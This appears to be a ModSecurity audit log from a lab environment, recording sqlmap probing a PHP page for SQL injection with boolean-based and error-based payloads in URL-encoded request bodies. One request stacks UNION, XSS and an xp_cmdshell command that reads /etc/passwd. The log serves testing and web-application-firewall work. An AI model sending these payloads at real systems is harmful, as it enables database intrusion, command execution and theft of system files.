--a11aa618-A--
[26/Apr/2017:14:53:10 --0400] WQDsln8AAQEAABM1cKkAAAAD 10.0.2.2 48792 10.0.2.15 80
--a11aa618-B--
GET /sqli_get.php?id=1 HTTP/1.1
Host: 127.0.0.1:8080
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://127.0.0.1:8080/
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: en-US,en;q=0.8

--a11aa618-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 581
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

--a11aa618-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232790669487 4009 (- - -)
Stopwatch2: 1493232790669487 4009; combined=15, p1=1, p2=10, p3=0, p4=0, p5=3, sr=0, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--a11aa618-Z--

--a11aa618-A--
[26/Apr/2017:14:53:10 --0400] WQDsln8AAQEAABM1cKoAAAAD 10.0.2.2 48792 10.0.2.15 80
--a11aa618-B--
GET /favicon.ico HTTP/1.1
Host: 127.0.0.1:8080
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36
Accept: image/webp,image/*,*/*;q=0.8
Referer: http://127.0.0.1:8080/sqli_get.php?id=1
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: en-US,en;q=0.8

--a11aa618-F--
HTTP/1.1 404 Not Found
Content-Length: 275
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

--a11aa618-H--
Stopwatch: 1493232790863685 2696 (- - -)
Stopwatch2: 1493232790863685 2696; combined=16, p1=2, p2=10, p3=0, p4=0, p5=3, sr=0, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--a11aa618-Z--

--e6a95c48-A--
[26/Apr/2017:14:53:23 --0400] WQDso38AAQEAABM02AYAAAAC 192.168.56.102 49494 192.168.56.101 80
--e6a95c48-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 4
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--e6a95c48-C--
id=1
--e6a95c48-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 584
Connection: close
Content-Type: text/html; charset=UTF-8

--e6a95c48-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232803248151 3818 (- - -)
Stopwatch2: 1493232803248151 3818; combined=18, p1=1, p2=15, p3=0, p4=0, p5=2, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--e6a95c48-Z--

--e6a95c48-A--
[26/Apr/2017:14:53:23 --0400] WQDso38AAQEAABM2g9gAAAAE 192.168.56.102 49496 192.168.56.101 80
--e6a95c48-B--
POST /sqli_post.php?LfFF%3D2650%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23 HTTP/1.1
Content-Length: 4
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--e6a95c48-C--
id=1
--e6a95c48-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 584
Connection: close
Content-Type: text/html; charset=UTF-8

--e6a95c48-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232803276797 4913 (- - -)
Stopwatch2: 1493232803276797 4913; combined=38, p1=0, p2=34, p3=0, p4=0, p5=3, sr=0, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--e6a95c48-Z--

--4bf5ea7b-A--
[26/Apr/2017:14:53:24 --0400] WQDspH8AAQEAABMzHu8AAAAB 192.168.56.102 49498 192.168.56.101 80
--4bf5ea7b-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 4
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--4bf5ea7b-C--
id=1
--4bf5ea7b-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 584
Connection: close
Content-Type: text/html; charset=UTF-8

--4bf5ea7b-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232804248149 3173 (- - -)
Stopwatch2: 1493232804248149 3173; combined=20, p1=1, p2=16, p3=0, p4=0, p5=3, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--4bf5ea7b-Z--

--4bf5ea7b-A--
[26/Apr/2017:14:53:24 --0400] WQDspH8AAQEAABMySFoAAAAA 192.168.56.102 49500 192.168.56.101 80
--4bf5ea7b-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 30
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--4bf5ea7b-C--
id=1%29%28.%22%27.%2C%28%28%28
--4bf5ea7b-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 577
Connection: close
Content-Type: text/html; charset=UTF-8

--4bf5ea7b-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232804254601 2490 (- - -)
Stopwatch2: 1493232804254601 2490; combined=17, p1=0, p2=15, p3=0, p4=0, p5=2, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--4bf5ea7b-Z--

--4bf5ea7b-A--
[26/Apr/2017:14:53:24 --0400] WQDspH8AAQEAABM5ZB4AAAAF 192.168.56.102 49502 192.168.56.101 80
--4bf5ea7b-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 31
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--4bf5ea7b-C--
id=1%27BvHjQF%3C%27%22%3EGLHpNB
--4bf5ea7b-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 583
Connection: close
Content-Type: text/html; charset=UTF-8

--4bf5ea7b-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232804259716 2553 (- - -)
Stopwatch2: 1493232804259716 2553; combined=19, p1=0, p2=15, p3=0, p4=0, p5=4, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--4bf5ea7b-Z--

--4bf5ea7b-A--
[26/Apr/2017:14:53:24 --0400] WQDspH8AAQEAABM1cKsAAAAD 192.168.56.102 49504 192.168.56.101 80
--4bf5ea7b-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 36
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--4bf5ea7b-C--
id=1%29%20AND%201644%3D5902--%20mIQr
--4bf5ea7b-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 587
Connection: close
Content-Type: text/html; charset=UTF-8

--4bf5ea7b-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232804337383 2257 (- - -)
Stopwatch2: 1493232804337383 2257; combined=17, p1=0, p2=15, p3=0, p4=0, p5=2, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--4bf5ea7b-Z--

--4bf5ea7b-A--
[26/Apr/2017:14:53:24 --0400] WQDspH8AAQEAABM02AcAAAAC 192.168.56.102 49506 192.168.56.101 80
--4bf5ea7b-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 36
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--4bf5ea7b-C--
id=1%29%20AND%203483%3D3483--%20mCTF
--4bf5ea7b-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 584
Connection: close
Content-Type: text/html; charset=UTF-8

--4bf5ea7b-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232804342024 2360 (- - -)
Stopwatch2: 1493232804342024 2360; combined=12, p1=0, p2=10, p3=0, p4=0, p5=2, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--4bf5ea7b-Z--

--4bf5ea7b-A--
[26/Apr/2017:14:53:24 --0400] WQDspH8AAQEAABM2g9kAAAAE 192.168.56.102 49508 192.168.56.101 80
--4bf5ea7b-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 50
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--4bf5ea7b-C--
id=1%29%20AND%207156%3D8806%20AND%20%281768%3D1768
--4bf5ea7b-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 591
Connection: close
Content-Type: text/html; charset=UTF-8

--4bf5ea7b-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232804346858 8718 (- - -)
Stopwatch2: 1493232804346858 8718; combined=15, p1=0, p2=12, p3=0, p4=0, p5=3, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--4bf5ea7b-Z--

--4bf5ea7b-A--
[26/Apr/2017:14:53:24 --0400] WQDspH8AAQEAABMzHvAAAAAB 192.168.56.102 49510 192.168.56.101 80
--4bf5ea7b-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 50
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--4bf5ea7b-C--
id=1%29%20AND%203483%3D3483%20AND%20%287213%3D7213
--4bf5ea7b-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 588
Connection: close
Content-Type: text/html; charset=UTF-8

--4bf5ea7b-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232804353188 4392 (- - -)
Stopwatch2: 1493232804353188 4392; combined=15, p1=0, p2=12, p3=0, p4=0, p5=3, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--4bf5ea7b-Z--

--4bf5ea7b-A--
[26/Apr/2017:14:53:24 --0400] WQDspH8AAQEAABMySFsAAAAA 192.168.56.102 49512 192.168.56.101 80
--4bf5ea7b-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 56
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--4bf5ea7b-C--
id=1%29%29%20AND%205775%3D6370%20AND%20%28%289758%3D9758
--4bf5ea7b-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 593
Connection: close
Content-Type: text/html; charset=UTF-8

--4bf5ea7b-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232804358940 2933 (- - -)
Stopwatch2: 1493232804358940 2933; combined=15, p1=0, p2=12, p3=0, p4=0, p5=3, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--4bf5ea7b-Z--

--4bf5ea7b-A--
[26/Apr/2017:14:53:24 --0400] WQDspH8AAQEAABM5ZB8AAAAF 192.168.56.102 49514 192.168.56.101 80
--4bf5ea7b-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 56
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--4bf5ea7b-C--
id=1%29%29%20AND%203483%3D3483%20AND%20%28%284199%3D4199
--4bf5ea7b-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 590
Connection: close
Content-Type: text/html; charset=UTF-8

--4bf5ea7b-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232804365887 4390 (- - -)
Stopwatch2: 1493232804365887 4390; combined=16, p1=1, p2=12, p3=0, p4=0, p5=3, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--4bf5ea7b-Z--

--4bf5ea7b-A--
[26/Apr/2017:14:53:24 --0400] WQDspH8AAQEAABM1cKwAAAAD 192.168.56.102 49516 192.168.56.101 80
--4bf5ea7b-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 62
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--4bf5ea7b-C--
id=1%29%29%29%20AND%208588%3D7276%20AND%20%28%28%284761%3D4761
--4bf5ea7b-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 596
Connection: close
Content-Type: text/html; charset=UTF-8

--4bf5ea7b-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232804371807 2528 (- - -)
Stopwatch2: 1493232804371807 2528; combined=13, p1=0, p2=11, p3=0, p4=0, p5=2, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--4bf5ea7b-Z--

--4bf5ea7b-A--
[26/Apr/2017:14:53:24 --0400] WQDspH8AAQEAABM02AgAAAAC 192.168.56.102 49518 192.168.56.101 80
--4bf5ea7b-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 62
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--4bf5ea7b-C--
id=1%29%29%29%20AND%203483%3D3483%20AND%20%28%28%285581%3D5581
--4bf5ea7b-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 593
Connection: close
Content-Type: text/html; charset=UTF-8

--4bf5ea7b-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232804376681 2305 (- - -)
Stopwatch2: 1493232804376681 2305; combined=14, p1=0, p2=12, p3=0, p4=0, p5=2, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--4bf5ea7b-Z--

--4bf5ea7b-A--
[26/Apr/2017:14:53:24 --0400] WQDspH8AAQEAABM2g9oAAAAE 192.168.56.102 49520 192.168.56.101 80
--4bf5ea7b-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 24
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--4bf5ea7b-C--
id=1%20AND%207535%3D5477
--4bf5ea7b-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 467
Connection: close
Content-Type: text/html; charset=UTF-8

--4bf5ea7b-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232804382088 2373 (- - -)
Stopwatch2: 1493232804382088 2373; combined=13, p1=0, p2=10, p3=0, p4=0, p5=3, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--4bf5ea7b-Z--

--4bf5ea7b-A--
[26/Apr/2017:14:53:24 --0400] WQDspH8AAQEAABMzHvEAAAAB 192.168.56.102 49522 192.168.56.101 80
--4bf5ea7b-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 24
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--4bf5ea7b-C--
id=1%20AND%203483%3D3483
--4bf5ea7b-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 594
Connection: close
Content-Type: text/html; charset=UTF-8

--4bf5ea7b-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232804389027 2359 (- - -)
Stopwatch2: 1493232804389027 2359; combined=11, p1=0, p2=9, p3=0, p4=0, p5=2, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--4bf5ea7b-Z--

--4bf5ea7b-A--
[26/Apr/2017:14:53:24 --0400] WQDspH8AAQEAABMySFwAAAAA 192.168.56.102 49524 192.168.56.101 80
--4bf5ea7b-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 24
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--4bf5ea7b-C--
id=1%20AND%204205%3D6537
--4bf5ea7b-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 468
Connection: close
Content-Type: text/html; charset=UTF-8

--4bf5ea7b-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232804402788 2437 (- - -)
Stopwatch2: 1493232804402788 2437; combined=14, p1=0, p2=11, p3=0, p4=0, p5=3, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--4bf5ea7b-Z--

--4bf5ea7b-A--
[26/Apr/2017:14:53:24 --0400] WQDspH8AAQEAABM1cK0AAAAD 192.168.56.102 49526 192.168.56.101 80
--4bf5ea7b-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 234
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--4bf5ea7b-C--
id=1%20AND%20%28SELECT%202%2A%28IF%28%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x716b767171%2C%28SELECT%20%28ELT%287235%3D7235%2C1%29%29%29%2C0x716a787a71%2C0x78%29%29s%29%2C%208446744073709551610%2C%208446744073709551610%29%29%29
--4bf5ea7b-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 659
Connection: close
Content-Type: text/html; charset=UTF-8

--4bf5ea7b-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232804411200 2689 (- - -)
Stopwatch2: 1493232804411200 2689; combined=11, p1=0, p2=9, p3=0, p4=0, p5=2, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--4bf5ea7b-Z--

--4bf5ea7b-A--
[26/Apr/2017:14:53:24 --0400] WQDspH8AAQEAABM5ZCAAAAAF 192.168.56.102 49528 192.168.56.101 80
--4bf5ea7b-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 233
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--4bf5ea7b-C--
id=1%20OR%20%28SELECT%202%2A%28IF%28%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x716b767171%2C%28SELECT%20%28ELT%288522%3D8522%2C1%29%29%29%2C0x716a787a71%2C0x78%29%29s%29%2C%208446744073709551610%2C%208446744073709551610%29%29%29
--4bf5ea7b-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 658
Connection: close
Content-Type: text/html; charset=UTF-8

--4bf5ea7b-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232804417105 2766 (- - -)
Stopwatch2: 1493232804417105 2766; combined=13, p1=1, p2=10, p3=0, p4=0, p5=2, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--4bf5ea7b-Z--

--4bf5ea7b-A--
[26/Apr/2017:14:53:24 --0400] WQDspH8AAQEAABM2g9sAAAAE 192.168.56.102 49530 192.168.56.101 80
--4bf5ea7b-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 163
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--4bf5ea7b-C--
id=1%20AND%20EXP%28%7E%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x716b767171%2C%28SELECT%20%28ELT%281233%3D1233%2C1%29%29%29%2C0x716a787a71%2C0x78%29%29x%29%29
--4bf5ea7b-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 629
Connection: close
Content-Type: text/html; charset=UTF-8

--4bf5ea7b-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232804423492 2730 (- - -)
Stopwatch2: 1493232804423492 2730; combined=12, p1=1, p2=9, p3=0, p4=0, p5=2, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--4bf5ea7b-Z--

--4bf5ea7b-A--
[26/Apr/2017:14:53:24 --0400] WQDspH8AAQEAABM02AkAAAAC 192.168.56.102 49532 192.168.56.101 80
--4bf5ea7b-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 162
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--4bf5ea7b-C--
id=1%20OR%20EXP%28%7E%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x716b767171%2C%28SELECT%20%28ELT%289656%3D9656%2C1%29%29%29%2C0x716a787a71%2C0x78%29%29x%29%29
--4bf5ea7b-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 628
Connection: close
Content-Type: text/html; charset=UTF-8

--4bf5ea7b-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232804429576 2210 (- - -)
Stopwatch2: 1493232804429576 2210; combined=12, p1=0, p2=9, p3=0, p4=0, p5=3, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--4bf5ea7b-Z--

--4bf5ea7b-A--
[26/Apr/2017:14:53:24 --0400] WQDspH8AAQEAABMzHvIAAAAB 192.168.56.102 49534 192.168.56.101 80
--4bf5ea7b-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 173
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--4bf5ea7b-C--
id=1%20AND%20JSON_KEYS%28%28SELECT%20CONVERT%28%28SELECT%20CONCAT%280x716b767171%2C%28SELECT%20%28ELT%286029%3D6029%2C1%29%29%29%2C0x716a787a71%29%29%20USING%20utf8%29%29%29
--4bf5ea7b-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 612
Connection: close
Content-Type: text/html; charset=UTF-8

--4bf5ea7b-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232804437735 2469 (- - -)
Stopwatch2: 1493232804437735 2469; combined=16, p1=1, p2=12, p3=0, p4=0, p5=3, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--4bf5ea7b-Z--

--4bf5ea7b-A--
[26/Apr/2017:14:53:24 --0400] WQDspH8AAQEAABMySF0AAAAA 192.168.56.102 49536 192.168.56.101 80
--4bf5ea7b-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 172
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--4bf5ea7b-C--
id=1%20OR%20JSON_KEYS%28%28SELECT%20CONVERT%28%28SELECT%20CONCAT%280x716b767171%2C%28SELECT%20%28ELT%284192%3D4192%2C1%29%29%29%2C0x716a787a71%29%29%20USING%20utf8%29%29%29
--4bf5ea7b-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 610
Connection: close
Content-Type: text/html; charset=UTF-8

--4bf5ea7b-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232804445461 2475 (- - -)
